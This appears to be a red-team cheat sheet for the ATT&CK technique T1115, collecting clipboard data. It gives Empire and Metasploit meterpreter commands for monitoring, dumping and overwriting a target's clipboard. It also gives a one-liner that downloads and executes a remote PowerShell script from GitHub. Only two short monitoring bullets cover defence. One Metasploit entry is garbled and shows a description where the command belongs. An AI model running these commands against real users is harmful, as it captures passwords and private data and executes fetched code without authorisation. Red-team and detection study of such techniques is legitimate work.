Clipboard Data

https://attack.mitre.org/techniques/T1115/

ATT&CK ID: T1115

Permissions Required: User

Description

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

In Windows, Applications can access clipboard data by using the Windows API.

[Source]

Techniques

Empire

This module monitors the clipboard on a specified interval for changes to copied text.

usemodule powershell/collection/clipboard_monitor

Get-ClipboardContents

Get-ClipboardContents monitors for information currently in the clipboard and anything that may be copied to the clipboard for the duration of the scripts execution time.

iex (iwr -usebasicparsing https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/collection/Get-ClipboardContents.ps1);Get-ClipboardContents

Metasploit

This Metasploit module can be loaded from the meterpreter shell.

load extapi

# Read the target's current clipboard (text, files, images)
clipboard_get_data

# Dump all captured clipboard content
clipboard_monitor_dump

# Pause the active clipboard monitor
clipboard_monitor_pause

# Delete all captured clipboard content without dumping it
clipboard_monitor_purge

# Resume the paused clipboard monitor
clipboard_monitor_resume

# Start the clipboard monitor   
Start the clipboard monitor

# Stop the clipboard monitor   
clipboard_monitor_stop

# Write text to the target's clipboard    
clipboard_set_text

PowerShell

The native PowerShell command Get-Clipboard retrieves information that is currently stored in the clipboard.

Get-Clipboard

Mitigations

• Monitor executed commands and arguments to collect data stored in the clipboard from users copying information within or between applications.

• Monitor API calls that could collect data stored in the clipboard from users copying information within or between applications.